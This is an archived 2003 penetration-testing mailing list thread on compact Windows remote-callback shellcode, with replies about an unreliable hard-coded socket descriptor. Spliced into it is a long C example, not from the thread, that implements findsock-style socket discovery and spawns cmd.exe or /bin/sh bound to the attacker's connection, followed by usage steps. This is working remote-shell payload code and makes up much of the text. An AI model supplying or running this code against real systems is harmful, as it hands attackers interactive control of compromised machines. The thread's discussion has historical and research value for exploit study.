Penetration Testing mailing list archives
Re: Advances In Windows Shellcode
From: "sk" <sk () scan-associates net>
Date: Wed, 15 Jan 2003 15:17:08 +0800
The 91++ byte shellcode not only uses hard-coded addresses, it also uses a hard-coded socket descriptor of 0x11, which should _not_ work. (Anyone get it working?) Perhaps what is missing is a routine to find the socket descriptor of the current connection?

sk
From: Ing. Bernardo Lopez (bloodk_at_prodigy.net.mx)
Date: Wed Jan 01 2003 - 18:32:20 CST

I know this is not the fastest way but... Could it be easier to get the shellcode if you put it in your program and rebuild it (within a debugger, like SoftICE), then dump that modified address...
With this you can split off the includes and other extra stuff, just getting the minimal shellcode necessary...
Have a nice day
PS: Well then, my hypothetical method, or by doing a C program with includes and all?
On Tue, 31-12-2002 at 23:02, Brett Moore wrote:

Advances in Windows shellcode are few and far between. Papers exist detailing the process using anonymous pipes, and examples exist showing how to use a socket directly as the handle for stdin, stdout and stderr. RVA techniques can be used to write code that will run regardless of service pack, and there are not often times when shellcode space is extremely limited, so we should be happy with universal remote callback shellcode of ~300 bytes.

David Litchfield's post regarding using a socket as a handle included a statement: "If you hard code addresses ..... you can get the exploit code down to 160 bytes", which got me to thinking of how to write smaller remote callback shellcode.

What evolved was an idea, and then shellcode which sends a remote shell back, uses only 2 API calls, and is only 91 bytes in size. It does have limited uses, has hard-coded addresses for SP3, is messy, could be refined, but should provoke some interesting thought tangents. The code is not commented, is not at all user friendly, and to cut the size of the post is ill formatted, but those who seek the answer should be able to get it to work.

And now I go on holiday; my byte sequence patent should be ready for filing by the time I get back ;)
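The two technical points in this thread, the socket-as-stdio trick Brett Moore and David Litchfield refer to and sk's observation that a hard-coded descriptor such as 0x11 cannot be relied on, are illustrated in the following added example. It is not code from the thread or from any of the posters. Instead of a fixed descriptor it walks candidate descriptor values and asks getpeername() which one is the attacker's connection (the attacker's source port is assumed known, as in findsock-style shellcode, and the descriptor is assumed to lie below max_fd), then hands that socket to a child shell as stdin, stdout and stderr. The Windows path is the CreateProcess() + STARTF_USESTDHANDLES technique the thread discusses; the POSIX path (dup2() + execl()) is a swapped-in equivalent so the same file also builds and runs on a non-Windows host. The loopback connection built by make_loopback_pair() is a constructed fixture, not real traffic.

```c
/* Added example, not from the thread. Findsock + socket-as-stdio reverse
 * shell. Assumptions: attacker's source port is known; descriptor < max_fd. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#  include <winsock2.h>
#  include <ws2tcpip.h>
#  include <windows.h>
typedef SOCKET sock_t;
#  define BAD_SOCK INVALID_SOCKET
#else
#  include <sys/socket.h>
#  include <netinet/in.h>
#  include <unistd.h>
typedef int sock_t;
#  define BAD_SOCK (-1)
#  define closesocket close
#endif

/* One-time socket library setup (only Windows needs it). 0 on success. */
int net_init(void)
{
#ifdef _WIN32
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2, 2), &wsa) == 0 ? 0 : -1;
#else
    return 0;
#endif
}

/* Findsock: first descriptor below max_fd whose TCP peer uses peer_port.
 * Non-socket descriptors make getpeername() fail and are skipped. Windows
 * SOCKET values are small handle numbers, so the same linear walk applies;
 * a few thousand is a sensible max_fd there. */
sock_t find_connected_socket(unsigned short peer_port, int max_fd)
{
    int fd;
    for (fd = 0; fd < max_fd; fd++) {
        struct sockaddr_in peer;
        socklen_t len = sizeof peer;
        if (getpeername((sock_t)fd, (struct sockaddr *)&peer, &len) != 0)
            continue;
        if (peer.sin_family == AF_INET && ntohs(peer.sin_port) == peer_port)
            return (sock_t)fd;
    }
    return BAD_SOCK;
}

/* Spawn a shell whose stdin/stdout/stderr are the socket itself. */
int spawn_shell_on_socket(sock_t s)
{
#ifdef _WIN32
    /* Caveat of the technique: the socket must be a non-overlapped handle
     * (WSASocket() without WSA_FLAG_OVERLAPPED) for cmd.exe to use it as a
     * plain file handle, and it must be inheritable (sockets are by default). */
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    char cmd[] = "cmd.exe";
    memset(&si, 0, sizeof si);
    si.cb = sizeof si;
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)s;
    if (!CreateProcessA(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
        return -1;
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
#else
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                 /* child: socket becomes fd 0, 1 and 2 */
        dup2(s, 0);
        dup2(s, 1);
        dup2(s, 2);
        execl("/bin/sh", "sh", "-i", (char *)NULL);
        _exit(127);
    }
    return 0;
#endif
}

/* Constructed fixture (not real traffic): a loopback TCP connection so the
 * finder has a "remote" peer to locate. Returns the accepted server-side
 * socket, the client socket and the client's ephemeral port. */
int make_loopback_pair(sock_t *server_side, sock_t *client_side,
                       unsigned short *client_port)
{
    struct sockaddr_in a, p;
    socklen_t alen = sizeof a, plen = sizeof p;
    sock_t l, c, s;

    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = 0;                 /* kernel picks a free port */
    l = socket(AF_INET, SOCK_STREAM, 0);
    if (l == BAD_SOCK || bind(l, (struct sockaddr *)&a, sizeof a) != 0 ||
        listen(l, 1) != 0 || getsockname(l, (struct sockaddr *)&a, &alen) != 0)
        return -1;
    c = socket(AF_INET, SOCK_STREAM, 0);
    if (c == BAD_SOCK || connect(c, (struct sockaddr *)&a, sizeof a) != 0)
        return -1;
    s = accept(l, (struct sockaddr *)&p, &plen);
    closesocket(l);
    if (s == BAD_SOCK)
        return -1;
    *server_side = s;
    *client_side = c;
    *client_port = ntohs(p.sin_port);
    return 0;
}
```

Usage: call net_init(), then find_connected_socket(attacker_port, 4096) and pass the result to spawn_shell_on_socket(). In real shellcode the walk replaces the hard-coded 0x11: handle values depend on what the target process has opened before the overflow, which is exactly why a fixed value only works by accident.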
Current thread:
- Advances In Windows Shellcode Brett Moore (Jan 01)
- Re: Advances In Windows Shellcode Ing. Bernardo Lopez (Jan 02)
- <Possible follow-ups>
- Re: Advances In Windows Shellcode sk (Jan 21)